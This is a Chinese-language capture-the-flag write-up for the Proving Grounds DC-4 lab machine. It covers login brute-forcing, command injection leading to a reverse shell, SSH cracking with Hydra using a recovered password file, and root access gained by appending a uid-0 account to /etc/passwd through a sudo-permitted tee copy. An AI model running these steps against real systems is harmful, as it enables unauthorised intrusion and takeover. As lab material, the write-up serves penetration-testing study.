OSCP - Proving Grounds - DC-4

ops/2024/12/17 18:08:05/

主要知识点

  • 密码爆破
  • 潜在的包含密码的文件搜索
  • 在/etc/passwd 插入新用户提权

具体步骤

首先执行nmap 扫描,比较直接,80和22端口,22端口虽然有vulnerability,但是对咱们目前的情况来讲没有太大的帮助,主要关注一下80端口

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-13 09:37 UTC
Nmap scan report for 192.168.52.195
Host is up (0.0018s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA)
|   256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA)
|_  256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519)
80/tcp open  http    nginx 1.15.10
|_http-title: System Tools
|_http-server-header: nginx/1.15.10

对80端口进行nikto扫描和路径爆破,得到如下内容

C:\home\kali\Documents\OFFSEC\play\DC-4> cat nikto.txt 
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.52.195
+ Target Hostname:    192.168.52.195
+ Target Port:        80
+ Start Time:         2024-12-13 09:38:25 (GMT0)
---------------------------------------------------------------------------
+ Server: nginx/1.15.10
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /login.php: Cookie PHPSESSID created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8102 requests: 0 error(s) and 4 item(s) reported on remote host
+ End Time:           2024-12-13 09:38:38 (GMT0) (13 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.172.195
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/SecLists/Discovery/Web-Content/big.txt
[+] Negative Status codes:   502,404,429,503,400
[+] User Agent:              gobuster/3.6
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/command.php          (Status: 302) [Size: 704] [--> index.php]
/css                  (Status: 301) [Size: 170] [--> http://192.168.172.195/css/]
/images               (Status: 301) [Size: 170] [--> http://192.168.172.195/images/]
/index.php            (Status: 200) [Size: 506]
/login.php            (Status: 302) [Size: 206] [--> index.php]
/logout.php           (Status: 302) [Size: 163] [--> index.php]
Progress: 40952 / 40954 (100.00%)
===============================================================
Finished
===============================================================

看来80端口开放了一个PHP写的应用,并且有command.php,index.php,login.php等主要文件,且login.php为登录页面

打开burpsuite ,尝试进行密码爆破,得到admin / happy 作为用户名和密码可以登录成功

登录成功后跳转到 command.php页面

查看请求,发现其实是发送了一个linux 命令作为参数,于是我们把该条请求记录发送到Repeater中进行修改,创建reverse shell

利用reverse shell我们可以查看到 old-passwords.bak,将其下载到本地后用来当做wordlist进行爆破

C:\home\kali\Documents\OFFSEC\play\DC-4> nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.206] from (UNKNOWN) [192.168.172.195] 48660
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
pwd
/usr/share/nginx/html
cd /home/jim
ls -l
total 16
drwxr-xr-x 2 jim  jim  4096 Apr  7  2019 backups
-rw-r--r-- 1 root root   33 Dec 13 21:42 local.txt
-rw------- 1 jim  jim   528 Apr  6  2019 mbox
-rwxrwxrwx 1 jim  jim   190 Dec 13 22:07 test.sh
cd backups
ls
old-passwords.bak

得到密码jibril04

C:\home\kali\Documents\OFFSEC\play\DC-4> hydra -l jim -P password_list.txt ssh://192.168.172.195       
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-12-13 20:09:23
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 252 login tries (l:1/p:252), ~16 tries per task
[DATA] attacking ssh://192.168.172.195:22/
[STATUS] 214.00 tries/min, 214 tries in 00:01h, 41 to do in 00:01h, 13 active
[22][ssh] host: 192.168.172.195   login: jim   password: jibril04
1 of 1 target successfully completed, 1 valid password found

用得到的密码可以以jim用户ssh登录到服务器,并且提示我有邮件

C:\home\kali\Documents\OFFSEC\play\DC-4> ssh jim@192.168.172.195             
The authenticity of host '192.168.172.195 (192.168.172.195)' can't be established.
ED25519 key fingerprint is SHA256:0CH/AiSnfSSmNwRAHfnnLhx95MTRyszFXqzT03sUJkk.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.172.195' (ED25519) to the list of known hosts.
jim@192.168.172.195's password: 
......
......
You have mail.
Last login: Sun Apr  7 02:23:55 2019 from 192.168.0.100
jim@dc-4:~$ sudo -l

查看了一下 mbox文件,没有太多收获,不过我们可以用来当做线索搜索其他邮件文件,于是我们上传linpeas.sh并运行,发现了线索

╔══════════╣ Mails (limit 50)9813      4 -rw-rw----   1 jim      mail         2425 Dec 13 22:13 /var/mail/jim7653      4 -rw-rw----   1 www-data mail         3516 Dec 13 22:04 /var/mail/www-data9813      4 -rw-rw----   1 jim      mail         2425 Dec 13 22:13 /var/spool/mail/jim7653      4 -rw-rw----   1 www-data mail         3516 Dec 13 22:04 /var/spool/mail/www-data

查看,得到了charles的密码

jim@dc-4:/var/mail$ cat jim 
From charles@dc-4 Sat Apr 06 21:15:46 2019
Return-path: <charles@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000
Received: from charles by dc-4 with local (Exim 4.89)(envelope-from <charles@dc-4>)id 1hCjIX-0000kO-Qtfor jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCjIX-0000kO-Qt@dc-4>
From: Charles <charles@dc-4>
Date: Sat, 06 Apr 2019 21:15:45 +1000
Status: OHi Jim,I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.Password is:  ^xHhA&hvim0ySee ya,
Charles

于是我们利用这个密码来变成charles身份,并且发现charles可以sudo执行/usr/bin/teehee,

charles@dc-4:/var/mail$ sudo -l
Matching Defaults entries for charles on dc-4:env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser charles may run the following commands on dc-4:(root) NOPASSWD: /usr/bin/teehee

经过观察和试验,这个teehee运行后会接受terminal的输入来写入到文件中,于是我们可以利用这一点来在/etc/passwd中追加一条记录

charles@dc-4:~$ /usr/bin/teehee --help
Usage: /usr/bin/teehee [OPTION]... [FILE]...
Copy standard input to each FILE, and also to standard output.-a, --append              append to the given FILEs, do not overwrite-i, --ignore-interrupts   ignore interrupt signals-p                        diagnose errors writing to non pipes--output-error[=MODE]   set behavior on write error.  See MODE below--help     display this help and exit--version  output version information and exit

首先创建一个密码,在追加如下内容到/etc/passwd文件并转换成tim的身份达成提权目的

charles@dc-4:~$ openssl passwd 1234
HQpXGqbwWyrdo
charles@dc-4:~$ sudo /usr/bin/teehee -a /etc/passwd
tim:HQpXGqbwWyrdo:0:0:root:/root:/bin/bash
charles@dc-4:~$ su tim
Password: 
root@dc-4:/home/charles#  cat /root/proof.txt
eb471b16059fc83e6f3cf3900b73be38

个人评价

总体来看,难度并不大但是步骤比较繁多,有些绕,尤其是登录密码爆破,考虑到网络以及社区版本的burpsuite的性能限制,只能尝试较小的wordlist,如果使用rockyou的话,到明天早晨也爆破不完,如果是考试的话,感觉尽量避免密码爆破,特别是使用大字典的情况。


http://www.ppmy.cn/ops/142703.html

相关文章

HTML零基础教学(REAL)

什么是HTML 一种超文本标记语言: HyperText Markup Language 常见误区&#xff1a;HTML 不是一种编程语言&#xff0c;而是一种标记语言 标记语言是一套标记标签 HTML文档的别名web 页面 HTML 使用标记标签来描述网页 HTML 文档包含了HTML 标签及文本内容 入门 新建一个…

2.Linux - 基础结构及命令

Linux - 基础结构及命令 文章目录 Linux - 基础结构及命令一、目录二、基础命令2.1 ls2.2.1 选项使用2.2.2 参数使用 2.2 目录切换 cd/pwd2.3 路径2.4 创建目录 mkdir2.5 文件操作命令2.5.1 创建文件 touch2.5.2 查看文件内容 cat/more2.5.3 复制文件/文件夹 cp2.5.4 移动文件/…

Leetcode1847:最近的房间

题目描述&#xff1a; 一个酒店里有 n 个房间&#xff0c;这些房间用二维整数数组 rooms 表示&#xff0c;其中 rooms[i] [roomIdi, sizei] 表示有一个房间号为 roomIdi 的房间且它的面积为 sizei 。每一个房间号 roomIdi 保证是 独一无二 的。 同时给你 k 个查询&#xff…

22. 正则表达式

一、概述 正则表达式&#xff08;regular expression&#xff09;又称 规则表达式&#xff0c;是一种文本模式&#xff08;pattern&#xff09;。正则表达式使用一个字符串来描述、匹配具有相同规格的字符串&#xff0c;通常被用来检索、替换那些符合某个模式&#xff08;规则&…

基于SpringBoot的“商务安全邮箱”的设计与实现(源码+数据库+文档+PPT)

基于SpringBoot的“商务安全邮箱”的设计与实现&#xff08;源码数据库文档PPT) 开发语言&#xff1a;Java 数据库&#xff1a;MySQL 技术&#xff1a;SpringBoot 工具&#xff1a;IDEA/Ecilpse、Navicat、Maven 系统展示 系统功能结构 收件箱效果图 草稿箱效果图 已发送效…

Facebook如何避免因IP变动而封号?实用指南

随着Facebook在个人社交与商业推广中的广泛应用&#xff0c;越来越多的用户面临因“IP变动”而被封号的问题。尤其是跨境电商、广告运营者和多账号管理用户&#xff0c;这种情况可能严重影响正常使用和业务发展。那么&#xff0c;如何避免因IP变动导致的封号问题&#xff1f;本…

Elasticsearch8.17.0在mac上的安装

1、下载并安装 下载8.17版本es(目前最新版本)&#xff1a;Download Elasticsearch | Elastic 也可以通过历史版本列表页下载&#xff1a;Past Releases of Elastic Stack Software | Elastic 当然也可以指定具体版本号进行下载&#xff1a;Elasticsearch 8.17.0 | Elastic …

前端-自定义Ant Design 表格(可编辑表格)

选取的的是&#xff1a;表格 Table - Ant Design 其实ant design本身就有增加和删除单列数据的封装好的表格&#xff0c;但是个人觉得那个功能繁多&#xff0c;自己实现封装也便于之后理解和二次使用。 初步效果&#xff08;舍去切换样式的功能&#xff09;&#xff1a; 突破的…